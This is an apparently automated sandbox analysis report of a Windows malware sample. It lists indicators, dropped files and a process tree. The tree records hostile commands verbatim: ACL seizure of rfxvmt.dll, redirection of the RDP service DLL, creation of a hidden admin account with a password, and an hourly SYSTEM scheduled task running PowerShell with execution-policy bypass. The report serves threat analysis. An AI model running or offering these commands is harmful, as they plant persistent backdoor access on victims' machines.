Analysis
-
max time kernel
90s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2022 08:29
Static task
static1
Behavioral task
behavioral1
Sample
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe
Resource
win10v2004-20220901-en
General
-
Target
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe
-
Size
2.3MB
-
MD5
8640faa50991a260de7cf73ea56b5461
-
SHA1
d2a2f5b1a4c3643290e8ce378f3c497c9b6f94d4
-
SHA256
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0
-
SHA512
0ab932f92e210b9171f8fa7cd18ac2ab94a552865bc0fdd72cdc1ebc52e85392730722f3563fd6bb9fc1635e63519d764b89ce600caafa29a5abb506611334cf
-
SSDEEP
49152:sc+3+iySeZ3sIbHhrQpfHm0RJHqulcsRycArKFU:sca+iTeDQfHm0RJHq9hcArd
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 3348 icacls.exe 3848 icacls.exe 2860 icacls.exe 5004 takeown.exe 4080 icacls.exe 4788 icacls.exe 5036 icacls.exe 820 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "%SystemRoot%\\help\\temp222.dat" reg.exe -
Processes:
resource yara_rule C:\Windows\Help\temp221.dat upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 3 IoCs
Processes:
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exepid process 4104 48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe 3156 3156 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 5036 icacls.exe 820 icacls.exe 3348 icacls.exe 3848 icacls.exe 2860 icacls.exe 5004 takeown.exe 4080 icacls.exe 4788 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 3 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\help\temp222.dat powershell.exe File created C:\Windows\help\temp221.dat powershell.exe File created C:\Windows\help\temp220.dat powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5008 timeout.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 3428 powershell.exe 3428 powershell.exe 3428 powershell.exe 3428 powershell.exe 3428 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 644 644 -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeicacls.exedescription pid process Token: SeDebugPrivilege 3428 powershell.exe Token: SeRestorePrivilege 4788 icacls.exe -
Suspicious use of WriteProcessMemory 58 IoCs
Processes:
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exewscript.execmd.exepowershell.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 4104 wrote to memory of 4904 4104 48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe wscript.exe PID 4104 wrote to memory of 4904 4104 48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe wscript.exe PID 4904 wrote to memory of 1448 4904 wscript.exe cmd.exe PID 4904 wrote to memory of 1448 4904 wscript.exe cmd.exe PID 1448 wrote to memory of 5008 1448 cmd.exe timeout.exe PID 1448 wrote to memory of 5008 1448 cmd.exe timeout.exe PID 1448 wrote to memory of 3428 1448 cmd.exe powershell.exe PID 1448 wrote to memory of 3428 1448 cmd.exe powershell.exe PID 3428 wrote to memory of 5004 3428 powershell.exe takeown.exe PID 3428 wrote to memory of 5004 3428 powershell.exe takeown.exe PID 3428 wrote to memory of 4080 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 4080 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 4788 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 4788 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 5036 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 5036 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 820 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 820 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 3348 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 3348 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 3848 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 3848 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 2860 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 2860 3428 powershell.exe icacls.exe PID 3428 wrote to memory of 1280 3428 powershell.exe reg.exe PID 3428 wrote to memory of 1280 3428 powershell.exe reg.exe PID 3428 wrote to memory of 724 3428 powershell.exe reg.exe PID 3428 wrote to memory of 724 3428 powershell.exe reg.exe PID 3428 wrote to memory of 3144 3428 powershell.exe net.exe PID 3428 wrote to memory of 3144 3428 powershell.exe net.exe PID 3144 wrote to memory of 1800 3144 net.exe net1.exe PID 3144 wrote to memory of 1800 3144 net.exe net1.exe PID 4388 wrote to memory of 1104 4388 cmd.exe net.exe PID 4388 wrote to memory of 1104 4388 cmd.exe net.exe PID 1104 wrote to memory of 4696 1104 net.exe net1.exe PID 1104 wrote to memory of 4696 1104 net.exe net1.exe PID 3428 wrote to memory of 1760 3428 powershell.exe cmd.exe PID 3428 wrote to memory of 1760 3428 powershell.exe cmd.exe PID 3428 wrote to memory of 5092 3428 powershell.exe cmd.exe PID 3428 wrote to memory of 5092 3428 powershell.exe cmd.exe PID 3748 wrote to memory of 3824 3748 cmd.exe net.exe PID 3748 wrote to memory of 3824 3748 cmd.exe net.exe PID 3824 wrote to memory of 2716 3824 net.exe net1.exe PID 3824 wrote to memory of 2716 3824 net.exe net1.exe PID 900 wrote to memory of 3340 900 cmd.exe net.exe PID 900 wrote to memory of 3340 900 cmd.exe net.exe PID 3340 wrote to memory of 4320 3340 net.exe net1.exe PID 3340 wrote to memory of 4320 3340 net.exe net1.exe PID 912 wrote to memory of 3668 912 cmd.exe net.exe PID 912 wrote to memory of 3668 912 cmd.exe net.exe PID 3668 wrote to memory of 5032 3668 net.exe net1.exe PID 3668 wrote to memory of 5032 3668 net.exe net1.exe PID 3776 wrote to memory of 3860 3776 cmd.exe net.exe PID 3776 wrote to memory of 3860 3776 cmd.exe net.exe PID 3860 wrote to memory of 4184 3860 net.exe net1.exe PID 3860 wrote to memory of 4184 3860 net.exe net1.exe PID 1328 wrote to memory of 456 1328 cmd.exe schtasks.exe PID 1328 wrote to memory of 456 1328 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe"C:\Users\Admin\AppData\Local\Temp\48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\pomog.vbs2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rename C:\Users\Admin\AppData\Local\Temp\pomog.txt pomog.ps1&timeout -t 3& powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\pomog.ps13⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout -t 34⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\pomog.ps14⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\temp222.dat /f5⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc OBEz5mPg /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc OBEz5mPg /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc OBEz5mPg /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" IYMUGYHL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" IYMUGYHL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" IYMUGYHL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc OBEz5mPg1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc OBEz5mPg2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc OBEz5mPg3⤵
-
C:\Windows\System32\cmd.execmd /C schtasks /create /tn 99512 /tr "powershell -nop -ep bypass -f c:\windows\help\31016.ps1" /ru system /sc hourly /mo 11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /tn 99512 /tr "powershell -nop -ep bypass -f c:\windows\help\31016.ps1" /ru system /sc hourly /mo 12⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\12444.txtFilesize
2.4MB
MD5ac1bafbc7e973e69602d70d8e0ec3829
SHA165ba4b45cbbccd85ec5c155cd7c41736e5a3382c
SHA256524a02b242b293b05925caa4def1626e9e0facf971d779999ecbc2d2898ed194
SHA5127b71bc5ee36d44db6b2e226b588d42ed3f67cd73a188f801809dda6fdd37275b57129a2a41dd8f844b26e61c82aa205ab1182e842b7cb728e4f46fb2a233f1d6
-
C:\Users\Admin\AppData\Local\Temp\65336777.txtFilesize
36KB
MD52c50ffba8c7d98a9cb5fec3c2a6913df
SHA1849b62f4911551b69cab9bc5ca6cf1af7ca28fc0
SHA256f510b64ebae6560c829f3b7081bf6073633ad5cb089bf2fb7b86ae0ad96267b0
SHA5127d28e6f5d30c918a0324d487828de7cdbf22c6262a67927f110155a02f00f902263037eb0d1eff1ca31be744a0026d3081a5f74d7d47fc1e86b13c9f243ce750
-
C:\Users\Admin\AppData\Local\Temp\722666222.logFilesize
62KB
MD50c34e2096fc530535d1fb38b8e9f68a6
SHA1ac9912a3bf5da42cfa9bdc5a48a41c5336980f4a
SHA256fee2dc3b455813797160264ecebcda7c34707fdafc96320f843891500971fedb
SHA5120b4b21aecaff1b0e3a3ea9611954a4a32d3ae73c456373b0d6375d661192e09c608175de61abafc2f8bf264a7817a753052e1767ba3cb0755350af9966d66bdf
-
C:\Users\Admin\AppData\Local\Temp\9887742.txtFilesize
198KB
MD5074ff8eac2103666760749711597b336
SHA11c349951336d7059807d89163e9c118ef1a6bf26
SHA2560e22f549a70422bade6e5a19b9efe06c816e90f02f161882a24dde795cb33172
SHA5127c1f7397367e11ee62cc62f62b059b671409097dd857873c31346d704b0ef7b2d82e318fb8ed1eee3ddb3804ab1f13268190240e2c0ad213c6764118ccdaa237
-
C:\Users\Admin\AppData\Local\Temp\changes_765543.txtFilesize
102B
MD5b72f79c10c59890f9049cb5a6332d680
SHA14d3f6fa8a15c2fcaee275983e072207fe1c5b277
SHA2566589829ca13d08781f77e050907225885692cf6bd64f930ca6c9f9d71740942a
SHA512f103bca53aac43bcde9a4f9d7da62615861014d6b7e2e4ea775f04a551bf10f5e075a1863d575242d6a927eecc805b47ac5aca67b44a04eb36acb18cf73947dd
-
C:\Users\Admin\AppData\Local\Temp\nssCECF.tmp\System.dllFilesize
11KB
MD5fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
C:\Users\Admin\AppData\Local\Temp\pomog.txtFilesize
39KB
MD5f140a509e9385574c51a0b6c53d89638
SHA1c0471a4aa09ccb2fae2214d9fddc758058e4f92f
SHA256a15fcc9cd5680ba9bb513b46765554d68e8a11fb71826c25bce8cbc6be448af2
SHA51272baa25c367db6c922c692e6bd9052cb426438570d13e78577f482549a54e51497c5b3ed58dedabf261945a1b8dcb68833b52fdc7dfef9341f0a36c308ce4e3c
-
C:\Users\Admin\AppData\Local\Temp\pomog.vbsFilesize
142B
MD511789c8be9e4201c26d57b0e192489de
SHA16917bcfbeb124c48dbc1d08956f84e84b5a53960
SHA256ce810ffdf9f3462bd9334993b43f3209a5662127519f336ef7d440201f0fa8db
SHA512dcd2296e9174089d9b4802868cc1f3997ec814b8ab7a60b0a59af9f95742c53dac0fcf07c250f08041e91dcdfaaef1f3493b686c4f6a205543e06f2c801d8804
-
C:\Windows\Help\temp221.datFilesize
940KB
MD5666b20fd3f3d244f984a470e9d468f53
SHA11ed4fcf1994664b8cf511526f54996055f883f95
SHA2565d9227777bce252a4f1dfbd44e539e0b689cbffa831d8682f90c4df94bdb9873
SHA5129f0e625ae92a8d81f381e4b2e8dd489d30001481dfee361aca624f53b43177e95d8bf3cc982fd56671eaa59338ea9587464b7ec802885534b3b14300daf1b432
-
C:\Windows\Help\temp222.datFilesize
123KB
MD51e38a16381d1a98127bade41544334cf
SHA108766e656a810c1e31fe86bfe48eba4483e21bba
SHA256f832cf40fd4ba232b6005b2d487b40e97761351d6d1f10751fecdaa5a5a579a3
SHA5129a14f5bbfc76cfa71289edde85363bde7e14c95295da5fed7d8d24bce2379436083f4794955574e4bbe2ad9a0284c93cf4a09952bd0f24f1fce10462ad899635
-
C:\Windows\system32\rfxvmt.dllFilesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
memory/456-175-0x0000000000000000-mapping.dmp
-
memory/724-155-0x0000000000000000-mapping.dmp
-
memory/820-150-0x0000000000000000-mapping.dmp
-
memory/1104-162-0x0000000000000000-mapping.dmp
-
memory/1280-154-0x0000000000000000-mapping.dmp
-
memory/1448-135-0x0000000000000000-mapping.dmp
-
memory/1760-164-0x0000000000000000-mapping.dmp
-
memory/1800-157-0x0000000000000000-mapping.dmp
-
memory/2716-167-0x0000000000000000-mapping.dmp
-
memory/2860-153-0x0000000000000000-mapping.dmp
-
memory/3144-156-0x0000000000000000-mapping.dmp
-
memory/3340-168-0x0000000000000000-mapping.dmp
-
memory/3348-151-0x0000000000000000-mapping.dmp
-
memory/3428-140-0x00007FFB85BD0000-0x00007FFB86691000-memory.dmpFilesize
10.8MB
-
memory/3428-171-0x00007FFB85BD0000-0x00007FFB86691000-memory.dmpFilesize
10.8MB
-
memory/3428-158-0x00007FFB85BD0000-0x00007FFB86691000-memory.dmpFilesize
10.8MB
-
memory/3428-139-0x000001938A540000-0x000001938A562000-memory.dmpFilesize
136KB
-
memory/3428-138-0x0000000000000000-mapping.dmp
-
memory/3668-170-0x0000000000000000-mapping.dmp
-
memory/3824-166-0x0000000000000000-mapping.dmp
-
memory/3848-152-0x0000000000000000-mapping.dmp
-
memory/3860-173-0x0000000000000000-mapping.dmp
-
memory/4080-147-0x0000000000000000-mapping.dmp
-
memory/4184-174-0x0000000000000000-mapping.dmp
-
memory/4320-169-0x0000000000000000-mapping.dmp
-
memory/4696-163-0x0000000000000000-mapping.dmp
-
memory/4788-148-0x0000000000000000-mapping.dmp
-
memory/4904-133-0x0000000000000000-mapping.dmp
-
memory/5004-145-0x0000000000000000-mapping.dmp
-
memory/5008-137-0x0000000000000000-mapping.dmp
-
memory/5032-172-0x0000000000000000-mapping.dmp
-
memory/5036-149-0x0000000000000000-mapping.dmp
-
memory/5092-165-0x0000000000000000-mapping.dmp